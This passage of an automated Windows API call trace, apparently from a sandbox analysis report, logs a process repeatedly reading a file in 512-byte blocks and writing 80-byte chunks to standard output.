(_FileHandle=4) returned 0x58 [0162.993] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.993] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, 
lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.994] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.994] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 
[0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, 
lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.995] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.995] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.996] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.996] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, 
lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 
| out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.997] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.997] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.998] GetFileType (hFile=0x50) returned 0x1 [0162.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.998] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.003] GetFileType (hFile=0x50) returned 0x1 [0163.003] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0163.003] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 
[0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.004] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.005] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 
[0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.006] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.006] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, 
lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] GetFileType (hFile=0x50) returned 0x1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] GetFileType (hFile=0x50) returned 0x1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] GetFileType (hFile=0x50) returned 0x1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.007] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.007] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] GetFileType (hFile=0x50) returned 0x1 [0163.007] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: 
